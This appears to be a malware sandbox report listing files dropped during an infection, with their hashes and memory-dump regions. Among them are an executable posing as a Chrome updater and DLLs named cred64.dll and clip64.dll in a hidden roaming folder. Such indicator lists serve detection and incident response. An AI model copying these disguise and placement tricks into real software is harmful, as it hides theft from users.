SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/5140-342-0x0000000001040000-0x0000000001050000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

memory/5140-344-0x000000006D6B0000-0x000000006DC61000-memory.dmp

memory/2096-347-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3032-349-0x0000000003700000-0x0000000003831000-memory.dmp

memory/5140-352-0x000000006D6B0000-0x000000006DC61000-memory.dmp

memory/3396-348-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/5248-354-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

memory/3948-355-0x0000019A55500000-0x0000019A55510000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

memory/2096-333-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PNQH7.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2772-361-0x0000000000400000-0x0000000000513000-memory.dmp

memory/540-365-0x0000000000400000-0x000000000046A000-memory.dmp

memory/5140-372-0x000000006D6B0000-0x000000006DC61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/5248-392-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3948-393-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/2096-394-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 6f6dacd31cba5be683dc1d7aaf884829
SHA1 270c0a13ad69d44ffdff00f2e3db62c64b80d5f7
SHA256 5d71c61ddfd9e3a0ee69a4391b4aa3341b640dab6d1ba87334932b45ec9cd110
SHA512 b28187482f59e37bb1aab75218e3888cea34823c44d37677acef81c1c574fa2af65108cb1eeaed08a0e63920ac39386ca272d308424e8f351f57886ab694c8cf

memory/2396-418-0x0000000004E80000-0x0000000004E90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1236-424-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\additional_file0.tmp

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbgcore.DLL

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbgcore.dll

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbgcore.dll

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 f749f169456bf05f8a0c6b25c6e5160e
SHA1 c84a50b43a018ec3eaaa1c1f9722d510d8a9672a
SHA256 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3
SHA512 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639

memory/4616-478-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp

memory/4940-490-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/4940-491-0x00000259797C0000-0x00000259797D0000-memory.dmp

memory/4940-492-0x00000259797C0000-0x00000259797D0000-memory.dmp

memory/4940-503-0x0000025979FB0000-0x0000025979FCC000-memory.dmp

memory/4940-504-0x0000025979FD0000-0x000002597A085000-memory.dmp

memory/4940-505-0x00007FF49BF90000-0x00007FF49BFA0000-memory.dmp

memory/4940-506-0x000002597A090000-0x000002597A09A000-memory.dmp

memory/4940-507-0x000002597A200000-0x000002597A21C000-memory.dmp

memory/4940-509-0x000002597A1E0000-0x000002597A1EA000-memory.dmp

C:\Windows\TEMP\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/6080-524-0x00000000003D0000-0x00000000003F0000-memory.dmp

memory/4616-525-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

memory/6044-544-0x00007FF6F0040000-0x00007FF6F0053000-memory.dmp

memory/6080-545-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp

memory/6080-551-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp

memory/6080-560-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YQR9M4BX\s54[1].htm

MD5 e1671797c52e15f763380b45e841ec32
SHA1 58e6b3a414a1e090dfc6029add0f3555ccba127f
SHA256 3f79bb7b435b05321651daefd374cdc681dc06faa65e374e38337b88ca046dea
SHA512 87c568e037a5fa50b1bc911e8ee19a77c4dd3c22bce9932f86fdd8a216afe1681c89737fada6859e91047eece711ec16da62d6ccb9fd0de2c51f132347350d8c